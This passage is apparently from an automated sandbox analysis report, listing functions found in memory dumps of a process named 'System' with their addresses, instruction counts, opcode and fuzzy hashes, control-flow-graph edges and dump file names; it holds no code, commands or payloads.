                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 59eb40eccba94eca8d30af7cfc344029278ebf9db6a668b5a3505c17125c503e
                                                                                                      • Instruction ID: d4fdccf2a2043b4b2d32f9f07ade22a96170a8a61f098e02a54e8502caff3e76
                                                                                                      • Opcode Fuzzy Hash: 59eb40eccba94eca8d30af7cfc344029278ebf9db6a668b5a3505c17125c503e
                                                                                                      • Instruction Fuzzy Hash: 31F16371E1965D8FDBA8DB58D8A5BA8B7B1FF58300F0442BAD00DD7292DE346981CF41
                                                                                                      Function 00007FFD9B8A81B9 Relevance: .1, Instructions: 141COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 973 7ffd9b8a81b9-7ffd9b8a8204 975 7ffd9b8a8206 973->975 976 7ffd9b8a820b-7ffd9b8a8211 973->976 975->976 977 7ffd9b8a82e5-7ffd9b8a82eb 976->977 978 7ffd9b8a8216-7ffd9b8a824c 977->978 979 7ffd9b8a82f1-7ffd9b8a82fa 977->979 981 7ffd9b8a8252-7ffd9b8a82bf 978->981 986 7ffd9b8a82dd-7ffd9b8a82e2 981->986 987 7ffd9b8a82c1-7ffd9b8a82ca 981->987 986->977 987->986 988 7ffd9b8a82cc-7ffd9b8a82dc 987->988
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8a5000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 25467c3dd2ad27642291c27ef333ecdc3c515ee4c06c3120105787d50990d842
                                                                                                      • Instruction ID: ff8a8bb0e9ef9faa13b7646801f7d9b7002e7694c05a7751460b0a18e7e92857
                                                                                                      • Opcode Fuzzy Hash: 25467c3dd2ad27642291c27ef333ecdc3c515ee4c06c3120105787d50990d842
                                                                                                      • Instruction Fuzzy Hash: D251AE30A09A4E9FCF84EF98D494AED7BF1FF58310F0501AAE419E7261D634E990CB90
                                                                                                      Function 00007FFD9B8D981D Relevance: .1, Instructions: 138COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 989 7ffd9b8d981d-7ffd9b8d9867 991 7ffd9b8d9869 989->991 992 7ffd9b8d986e-7ffd9b8d98cb 989->992 991->992 1000 7ffd9b8d98d6-7ffd9b8d98da 992->1000 1001 7ffd9b8d98cd-7ffd9b8d98d4 992->1001 1002 7ffd9b8d98dc-7ffd9b8d9bb3 1000->1002 1003 7ffd9b8d98f7-7ffd9b8d9b06 1000->1003 1001->1000 1002->1000 1010 7ffd9b8d9bb9-7ffd9b8d9bc0 1002->1010 1007 7ffd9b8d9b08 1003->1007 1008 7ffd9b8d9b0d-7ffd9b8d9b1e 1003->1008 1007->1008 1011 7ffd9b8d9b29-7ffd9b8d9b41 1008->1011 1010->1000 1012 7ffd9b8d9b48-7ffd9b8d9bb3 1011->1012 1013 7ffd9b8d9b43 1011->1013 1012->1000 1012->1010 1013->1012
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 727ec486399b90a8dd7da88b459d841c14f8bb6646bbcc2134cacbb739dac9e3
                                                                                                      • Instruction ID: ec781dd3b63605edc634e6fcf2dda45f67fb263c0b67d40622a24f8d80fe0517
                                                                                                      • Opcode Fuzzy Hash: 727ec486399b90a8dd7da88b459d841c14f8bb6646bbcc2134cacbb739dac9e3
                                                                                                      • Instruction Fuzzy Hash: 89515130E0964E8FEBA4EB54C4A97B977A1FF98300F1146B6D01DD72A6DE34A945CB40
                                                                                                      Function 00007FFD9B893565 Relevance: .1, Instructions: 133COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b890000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 1d080320411af9b60dc2fe928501d8e7e973a0756a9740eb42d3b7d88eab97dc
                                                                                                      • Instruction ID: 1d6a457e6f1f434102bda4dbae2fdde5d6eea7e7564d2be9060c6bd8e84b429d
                                                                                                      • Opcode Fuzzy Hash: 1d080320411af9b60dc2fe928501d8e7e973a0756a9740eb42d3b7d88eab97dc
                                                                                                      • Instruction Fuzzy Hash: 01519970E1952D9EDFA4DF14C898BA9B7F0FB68301F5041EAD00DE22A5DB786A84CF41
                                                                                                      Function 00007FFD9B89FBC1 Relevance: .1, Instructions: 125COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b89c000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b66d0c0ebbf888d8c13532aaeed495d3e08f1823b10667b83f6c49dda7df770a
                                                                                                      • Instruction ID: 93a828e656d7d9be0a3f2c706834ed43b80baddd459b4d52487a66c90c25eeba
                                                                                                      • Opcode Fuzzy Hash: b66d0c0ebbf888d8c13532aaeed495d3e08f1823b10667b83f6c49dda7df770a
                                                                                                      • Instruction Fuzzy Hash: CC41A970E0992D8FEFBDDB48C8A56B877A1EF58304F0141B8D81DD76A1DA396E858B40
                                                                                                      Function 00007FFD9B8A7E49 Relevance: .1, Instructions: 87COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8a5000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 561b0aa1ab834fa4cc2ea7d22da72ed60fff295b28fcc2a968f82d1d25ad31e8
                                                                                                      • Instruction ID: 957795a3a1e9a3150a80d62792b70add7ff6e9e46da4586d6443a4f5e12720b0
                                                                                                      • Opcode Fuzzy Hash: 561b0aa1ab834fa4cc2ea7d22da72ed60fff295b28fcc2a968f82d1d25ad31e8
                                                                                                      • Instruction Fuzzy Hash: 1B317C34A0964D8FCB55DF58C495AED7BF1FF48300F06026AE849E3291CB34AD50CB91
                                                                                                      Function 00007FFD9B8DABDF Relevance: .1, Instructions: 85COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 35fa99fc21d3123dca3fec84b65cef20149309ec0f6c39eceeb499727443c33c
                                                                                                      • Instruction ID: 924b0293dc6a43fe4d745ab25f24f2b8feba448125a6cd04800fad451de252f9
                                                                                                      • Opcode Fuzzy Hash: 35fa99fc21d3123dca3fec84b65cef20149309ec0f6c39eceeb499727443c33c
                                                                                                      • Instruction Fuzzy Hash: D6318770E0950D9FEB74DB44C8656BC77B5EF98310F61037AD409931A1CE386AC1CB01
                                                                                                      Function 00007FFD9B890C25 Relevance: .1, Instructions: 84COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b890000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 9f3e28827d8aa8dd5d29ac496bdece1c1d95740baa13710c067437d7d95bee7f
                                                                                                      • Instruction ID: 05ee66e8d7d8df63e4fbb9d63047173eb726cac2be36f96fea75f768ba87c145
                                                                                                      • Opcode Fuzzy Hash: 9f3e28827d8aa8dd5d29ac496bdece1c1d95740baa13710c067437d7d95bee7f
                                                                                                      • Instruction Fuzzy Hash: BB216A36B0E29E8FEB129BA8DC211EC7F60EF46315F0605B3C154CB1E2D638260AC791
                                                                                                      Function 00007FFD9B8935FA Relevance: .1, Instructions: 81COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b890000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 73e9d3f07f1aa722b07891711f370e78a64c1983d049a2ff31d79657726f1f63
                                                                                                      • Instruction ID: 9cd9f6a2212821a05d5f5852e35a6e82be99ade3ed868c252c30b83454c32b7b
                                                                                                      • Opcode Fuzzy Hash: 73e9d3f07f1aa722b07891711f370e78a64c1983d049a2ff31d79657726f1f63
                                                                                                      • Instruction Fuzzy Hash: CB31BB31E0851C9FCF94DF14C895AE977F0FB69301F5051DA900EE3265DA75AA84CF42
                                                                                                      Function 00007FFD9B8936E9 Relevance: .1, Instructions: 81COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b890000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: bf9770380356fa4efc8f2f165135ffe854a610a5edd1e8fdc2791c564637230d
                                                                                                      • Instruction ID: 4b6fdd57d3ca7dc2e043791a511bb13c76247490b8c8257be995b34e8cb7d9de
                                                                                                      • Opcode Fuzzy Hash: bf9770380356fa4efc8f2f165135ffe854a610a5edd1e8fdc2791c564637230d
                                                                                                      • Instruction Fuzzy Hash: 3D319A31E1851C9FDFA4DF14C895AE977F1FB69301F5041EA900EE32A5DA75AA80CF42
                                                                                                      Function 00007FFD9B8E8BC9 Relevance: .1, Instructions: 76COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ec1d3dba5e851cd13c2eb1ab5a72a1db03926015a0b58a720b520e19705fd7de
                                                                                                      • Instruction ID: 4a6c7f40d50ddbbb8b8d31512b40900cc5a67055d643f155bc5fd97f20c3a36a
                                                                                                      • Opcode Fuzzy Hash: ec1d3dba5e851cd13c2eb1ab5a72a1db03926015a0b58a720b520e19705fd7de
                                                                                                      • Instruction Fuzzy Hash: 9B21CF70D0A64D8FEBA5EF68C8696ED7BB0FF59300F0105AAD418C71A2DB34A644CB01
                                                                                                      Function 00007FFD9B8911A2 Relevance: .1, Instructions: 74COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b890000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 08be8fa20c8c3396020defa822cd32e302d36fd9281344d60ffdcee7bd1f2ba3
                                                                                                      • Instruction ID: 7d3d51307b6b4a2d5d8aba3a1f609a1326237336d6a3cae76ae6c33b18ff540c
                                                                                                      • Opcode Fuzzy Hash: 08be8fa20c8c3396020defa822cd32e302d36fd9281344d60ffdcee7bd1f2ba3
                                                                                                      • Instruction Fuzzy Hash: 8621EB30A1891E9FEF94EFA8D8949ADB7F1FF18300B11457AD419E32A1EF34A941CB40
                                                                                                      Function 00007FFD9B890C38 Relevance: .1, Instructions: 65COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b890000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fe757176af999effbaaa2ca9fabc363eaaaf029ecc553428c9bdb23dfce830b4
                                                                                                      • Instruction ID: d2ac9f096e12720d48aeca8e02669c1d4c72ee62e0b594d859e0757b14527dc9
                                                                                                      • Opcode Fuzzy Hash: fe757176af999effbaaa2ca9fabc363eaaaf029ecc553428c9bdb23dfce830b4
                                                                                                      • Instruction Fuzzy Hash: E2110831B1E69E8FEB129BA8CC212E97B70EF46714F064573D054DB1E2DA38660A8791
                                                                                                      Function 00007FFD9B89FD6B Relevance: .1, Instructions: 61COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b89c000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 83bc141713749c2925e473006273c74ad905417ac7ace816d4fbe688743cf7f8
                                                                                                      • Instruction ID: 1af07dc9a93a0184cc0385206813c3ee8144a89f6219443c62b970a5b02131ba
                                                                                                      • Opcode Fuzzy Hash: 83bc141713749c2925e473006273c74ad905417ac7ace816d4fbe688743cf7f8
                                                                                                      • Instruction Fuzzy Hash: 13119A30A09A1D8FDFA9DB58C895AA8B7B5FF58301F5141E9E00DE7691CB31AE81CF40
                                                                                                      Function 00007FFD9B890C40 Relevance: .1, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b890000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fa47ed7fef2a9d9f400c17042f6106bcb56050dfaccf7207873ed05c136c5a01
                                                                                                      • Instruction ID: a53f67e38458c4522f17a141e878cfe67da901fa9a8afd30da53fa4edd7a2035
                                                                                                      • Opcode Fuzzy Hash: fa47ed7fef2a9d9f400c17042f6106bcb56050dfaccf7207873ed05c136c5a01
                                                                                                      • Instruction Fuzzy Hash: 66110631E1E69E8FEB129BA4CC252E97B70EF46714F0645B3D061DB2E2CA386609C751
                                                                                                      Function 00007FFD9B89FDE5 Relevance: .1, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b89c000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 05c7e1c3306b283a7c10560364e5bbe022ae47e523faf213ceddecb7c4f51900
                                                                                                      • Instruction ID: 1b7da776573538764a2ad90f61ca58d09af6ab20d8f2fa5a1fc046fe810dc3f3
                                                                                                      • Opcode Fuzzy Hash: 05c7e1c3306b283a7c10560364e5bbe022ae47e523faf213ceddecb7c4f51900
                                                                                                      • Instruction Fuzzy Hash: CF21BB30A09A1D8FCFA9DB18C895AA8B7B5FF58301F5141E9E00DD76A1CB30AA81CF40
                                                                                                      Function 00007FFD9B8E9938 Relevance: .1, Instructions: 59COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3bb50811943ed3a62e08eb6484710ff9a0a1e15075d91cd3ddaa67368b2c25d1
                                                                                                      • Instruction ID: 9de1c39706fa865e7b39fd9f712dcbb92a58626c7eaea98df1ad3081ac59b383
                                                                                                      • Opcode Fuzzy Hash: 3bb50811943ed3a62e08eb6484710ff9a0a1e15075d91cd3ddaa67368b2c25d1
                                                                                                      • Instruction Fuzzy Hash: 15114631E0D51DCBDB28FB98E8A85ECB7B1FF58315F11467AC01A932A2DF7469428B40
                                                                                                      Function 00007FFD9B8A783D Relevance: .1, Instructions: 54COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8a5000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6c57de5bed07e70911e0b2c2cdefbfcde18382b4ed689773f4c6a8b1866d7ece
                                                                                                      • Instruction ID: 4f70b75c0d89fe198f8257219209319a733d8351ef447cdc0786f7695efb8d7f
                                                                                                      • Opcode Fuzzy Hash: 6c57de5bed07e70911e0b2c2cdefbfcde18382b4ed689773f4c6a8b1866d7ece
                                                                                                      • Instruction Fuzzy Hash: 37016D31E0E50D4FE7119B54D8212FDBBB4EF8A314F420172E008D22D6DE385105C792
                                                                                                      Function 00007FFD9B8E5459 Relevance: .1, Instructions: 54COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 769019c807e60a13679326cca080a67dcdcb31c62df7c0d9fec6c07c532a7fdc
                                                                                                      • Instruction ID: ba538e2d9e47ab0e2c0407c22df4139efa9036146999ccfadbb4a8e2147422db
                                                                                                      • Opcode Fuzzy Hash: 769019c807e60a13679326cca080a67dcdcb31c62df7c0d9fec6c07c532a7fdc
                                                                                                      • Instruction Fuzzy Hash: 40115A70908A8D8FDF85EF68C899AE97BF0FF28301F0101AAD819D3161DB349584CB80
                                                                                                      Function 00007FFD9B890C48 Relevance: .1, Instructions: 53COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b890000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 168889cc31e01747f7430c8778f5a4d37fda9759d85e58abcf7bf9327c5c4f63
                                                                                                      • Instruction ID: 8ed8e14fbb526d422b35fbe89be87facd79ab1e7fd631d1e6efe2811ff664f1d
                                                                                                      • Opcode Fuzzy Hash: 168889cc31e01747f7430c8778f5a4d37fda9759d85e58abcf7bf9327c5c4f63
                                                                                                      • Instruction Fuzzy Hash: F911E131E0E29E8FEB129BA4CC252A97B70EF46704F0645B3D061DB2E6DA386609C751
                                                                                                      Function 00007FFD9B8A7FE1 Relevance: .0, Instructions: 50COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8A5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A5000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8a5000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 952325ce522164b20fc017bdb09222fe28f3d586e0d190c4997b992c808d7cf9
                                                                                                      • Instruction ID: a4d5940bd9f5230712bf71fb79fdfcd10eb5364a45d0fb9bae47919a1e2d6d49
                                                                                                      • Opcode Fuzzy Hash: 952325ce522164b20fc017bdb09222fe28f3d586e0d190c4997b992c808d7cf9
                                                                                                      • Instruction Fuzzy Hash: 1B015634A1968DCFCB95EF18C891AD93BF0FF18304F0601AAE848C7261D774E960CB81
                                                                                                      Function 00007FFD9B8DA2D9 Relevance: .0, Instructions: 50COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 703ac6e322d3fbef8415fefbd4b8ad18c6afdbd4c146b8e43a781989145aac37
                                                                                                      • Instruction ID: a99ae915b0229f6a6bbec878e8aa5c81feeee85099718937e44acf35369314ee
                                                                                                      • Opcode Fuzzy Hash: 703ac6e322d3fbef8415fefbd4b8ad18c6afdbd4c146b8e43a781989145aac37
                                                                                                      • Instruction Fuzzy Hash: E6111E3090864D8FCF85EF68C859AEA7BF0FF69304F0105ABE459D7161D7349554CB41
                                                                                                      Function 00007FFD9B8E5539 Relevance: .0, Instructions: 50COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 8bf418eeab8bf32c64110ade5bf008c09aa93fb4c3950c2cc2ea13a7c35d5911
                                                                                                      • Instruction ID: bc2f9cc172d44955d483e9d4e0f1a2d520790a95162b5312ab5dfe657a60922a
                                                                                                      • Opcode Fuzzy Hash: 8bf418eeab8bf32c64110ade5bf008c09aa93fb4c3950c2cc2ea13a7c35d5911
                                                                                                      • Instruction Fuzzy Hash: F4111870908A8D8FCF85EF68C858AE97BF0FF29301F0501AAD409D72A1D734D554CB81
                                                                                                      Function 00007FFD9B89EB8B Relevance: .0, Instructions: 48COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B89C000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B89C000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b89c000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: a2240eeb96ea7f0a1a5282d337980e4fd46caff3981e171ced985dc2250696a9
                                                                                                      • Instruction ID: 5c9d9785e5d0eab9844f17256971d19535e0a58a8c472a140d0cffbd1156e88a
                                                                                                      • Opcode Fuzzy Hash: a2240eeb96ea7f0a1a5282d337980e4fd46caff3981e171ced985dc2250696a9
                                                                                                      • Instruction Fuzzy Hash: D501B13194E7CD9FEB529BB448650E83FA0EF06205F1641FAD449D70A3DA28568A8301
                                                                                                      Function 00007FFD9B8E5D19 Relevance: .0, Instructions: 48COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 2beb80400ec81fa4dba02f30b4851489213b0371d7e814f4cd5cbb2f7830dbff
                                                                                                      • Instruction ID: 7f3048e4bd895ab4526ebf6e30d7d07bdd89ddd000905fa9035f5c838073c8b8
                                                                                                      • Opcode Fuzzy Hash: 2beb80400ec81fa4dba02f30b4851489213b0371d7e814f4cd5cbb2f7830dbff
                                                                                                      • Instruction Fuzzy Hash: 8C018C30909A4D8FCF85EF68C858AEA7BF0FF29300F0505AAD418C71A2CB359590CB80
                                                                                                      Function 00007FFD9B8DC9C9 Relevance: .0, Instructions: 47COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 37257a170cea4d83a4dd5b24ec02881857826b80a4a77e20aa544bd5df49db9f
                                                                                                      • Instruction ID: b20383424d9a2a59c9c61d087aa88f70244a2a240c266e64648d414a2b71d4c2
                                                                                                      • Opcode Fuzzy Hash: 37257a170cea4d83a4dd5b24ec02881857826b80a4a77e20aa544bd5df49db9f
                                                                                                      • Instruction Fuzzy Hash: 4701407090968C8FCB45DF68C859AD97FF0FF59304F05429BE449C71A2DB349994CB41
                                                                                                      Function 00007FFD9B8E23D9 Relevance: .0, Instructions: 45COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000033.00000002.2556203087.00007FFD9B8D7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D7000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_51_2_7ffd9b8d7000_System.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fa322433210d367e362c5b6096575ec6ebdd775bbd157fca8d9b1e5a714cdd9a
                                                                                                      • Instruction ID: 0922f089c5ed2a8709ab9b53b808f032277b571de9d111caa9bee86c4e969cac
                                                                                                      • Opcode Fuzzy Hash: fa322433210d367e362c5b6096575ec6ebdd775bbd157fca8d9b1e5a714cdd9a
                                                                                                      • Instruction Fuzzy Hash: 3D014C3090968D8FCF85EF68C854AAA7BB0FF29300F0505AAD418C71A2DB74DA54CB81
                                                                                                      Function 00007FFD9B8DBD59 Relevance: .0, Instructions: 45COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
